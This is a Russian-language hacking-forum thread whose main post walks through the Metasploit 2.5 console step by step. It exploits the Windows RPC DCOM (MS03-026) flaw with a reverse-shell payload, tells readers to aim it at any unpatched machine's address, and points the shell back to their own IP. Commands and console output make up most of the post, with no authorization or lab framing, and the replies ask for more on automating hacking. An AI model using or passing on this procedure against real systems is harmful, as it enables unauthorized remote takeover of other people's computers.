• XSS.stack #1 – первый литературный журнал от юзеров форума

Metasploit Framework - обзор.

profeto

(L2) cache
Пользователь
Регистрация
09.08.2006
Сообщения
353
Реакции
0
Metasploit Framework - обзор.

Итак, для тех, кто не знаком с этой прогой, знакомьтесь: Metasploit Framework, среда, предназначенная для разработки и тестирования эксплоитов. Проще говоря, Metasploit Framework (далее MSF) это огромная база эксплойтов, которая постоянно обновляется (эксплоит – это программный код, использующий уязвимость в программном обеспечении.). Скачать сабж можно здесь: http://www.metasploit.com/. Версии метасплойта есть как под винду, так и под юникс-подобные системы. Дистр MSF весит около ~10 мб, после распаковки занимает около 50 мб. Итак, после того, как ты скачал и установил метасплойт, перед тобой откроется окно консоли. Если ты ожидал увидеть вместо этого красивый gui-интерфейс, то тут тебя ждет облом %), придется учить команды консоли MSF. Сразу предупрежу, что открывается консоль достаточно долго (в зависимости от размера базы). Можно начинать работать, как только увидишь в окне консоли надпись:
Код:
msf >
Над этим словом можно увидеть статистику базы:
Код:
+ -- --=[ msfconsole v2.5 [143 exploits - 75 payloads] - что-то вроде этого;).

Вводим самую первую команду в неизвестной пока консоли %) - это help.
Код:
msf > show exploits

Нам выдаст:
        ?            Show the main console help
        cd           Change working directory
        exit         Exit the console
        help         Show the main console help
        info         Display detailed exploit or payload information
        quit         Exit the console
        reload       Reload exploits and payloads
        save         Save configuration to disk
        setg         Set a global environment variable
        show         Show available exploits and payloads
        unsetg       Remove a global environment variable
        use          Select an exploit by name
        version      Show console version
Я думаю,в этих командах больших проблем нет, тут достаточно знание английского, чтобы понять суть каждой команды. Поэтому двинемся дальше и посмотрим, какие эксплойты нам доступны на данный момент:
Код:
msf > show exploits
Перед тобой вылетит огромный список имеющихся сплойтов. Для примера заюзаем достаточно нашумевшую багу в винде - RPC DCOM. В списке, эксплоит под эту багу носит название: msrpc_dcom_ms03_026
Код:
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 >
Вот мы перешли в настройки этого эксплойта. Посмотрим цели данного сплоита:
Код:
msf msrpc_dcom_ms03_026 > show targets

Supported Exploit Targets
=========================

   0  Windows NT SP3-6a/2K/XP/2K3 English ALL
Как видно, захвачена большая линейка %).

Далее посмотрим действия, которые может совершить сплоит:
Код:
msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads
====================================

  win32_adduser                  Windows Execute net user /ADD
  win32_bind                     Windows Bind Shell
  win32_bind_dllinject           Windows Bind DLL Inject
  win32_bind_meterpreter         Windows Bind Meterpreter DLL Inject
  win32_bind_stg                 Windows Staged Bind Shell
  win32_bind_stg_upexec          Windows Staged Bind Upload/Execute
  win32_bind_vncinject           Windows Bind VNC Server DLL Inject
  win32_downloadexec             Windows Executable Download and Execute
  win32_exec                     Windows Execute Command
  win32_passivex                 Windows PassiveX ActiveX Injection Payload
  win32_passivex_meterpreter     Windows PassiveX ActiveX Inject Meterpreter Pay
load
  win32_passivex_stg             Windows Staged PassiveX Shell
  win32_passivex_vncinject       Windows PassiveX ActiveX Inject VNC Server Payl
oad
  win32_reverse                  Windows Reverse Shell
  win32_reverse_dllinject        Windows Reverse DLL Inject
  win32_reverse_meterpreter      Windows Reverse Meterpreter DLL Inject
  win32_reverse_ord              Windows Staged Reverse Ordinal Shell
  win32_reverse_ord_vncinject    Windows Reverse Ordinal VNC Server Inject
  win32_reverse_stg              Windows Staged Reverse Shell
  win32_reverse_stg_upexec       Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject        Windows Reverse VNC Server Inject
Список также впечатляет. Для нашего примера возьмем действие win32_reverse (мы получим консоль управления удаленной тачкой.) Чтобы установить нужное действие делаем следующее:
Код:
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
, где win32_reverse - нужное нам действие. Далее посмотрим параметры эксплойта:
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     135        The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------

  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LHOST                  Local address to receive connection
  required    LPORT       4321       Local port to receive connection

  Target: Windows NT SP3-6a/2K/XP/2K3 English ALL
Здесь видно, что нужно произвести некоторые настройки, а именно: 1) В разделе Exploit поставить нужное значение для параметра RHOST (удаленный хост - хост, который мы будем атаковать). 2) в разделе Payload нужно настроить параметр LHOST. Параметры RPORT и LPOST уже стоят по дефолту , их менять не нужно. Назначаем адрес цели (RHOST):
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
Думаю, понятно, что вместо 127.0.0.1 вы указываете ip-адрес непропатченной тачки ;). Далее опять смотрим параметры эксплойта командой show options и видим, что параметр RHOST приобрел наше значение.
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default          Description
  --------    ------    -------------    ------------------
  required    RHOST     127.0.0.1        The target address
  required    RPORT     135              The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------

  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LHOST                  Local address to receive connection
  required    LPORT       4321       Local port to receive connection

  Target: Windows NT SP3-6a/2K/XP/2K3 English ALL
Как видно, осталось указать параметр LHOST в разделе Payload. LHOST - это нас адрес, поэтому указываем наш ip-адрес, чтобы получить возможность управлять удаленным компом.
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 195.0.0.1
LHOST -> 195.0.0.1
Значение установили, теперь можете проверить - все поля заполнены, эксплойт готов к работе. Осталось самое приятное - запустить сплойт командой exploit
Код:
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
Далее, в зависимости от того, пропатчена удаленная машина или нет, будет либо облом, либо великое счастье %))

Работа и конфигурирование остальных эксплойтов сильно не отличается. Разобрав одно - сложностей с остальными быть не должно. На этом я, пожалуй, и закончу %). Удачи.
 
Класная статейка.... новичкам обязательно поможет.... еще бы продолжение: "Автоматизация процэса взлома с использованием Metasploit Framework 3"

я думаю было бы увлекательно....
 
Нашел такой интересный топ :) перенесите его в "веб"?

Чтобы ап был полезным, делюсь шпаргалкой по основным Metasploit командам. Наиболее часто используемые команды

index.jpg
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх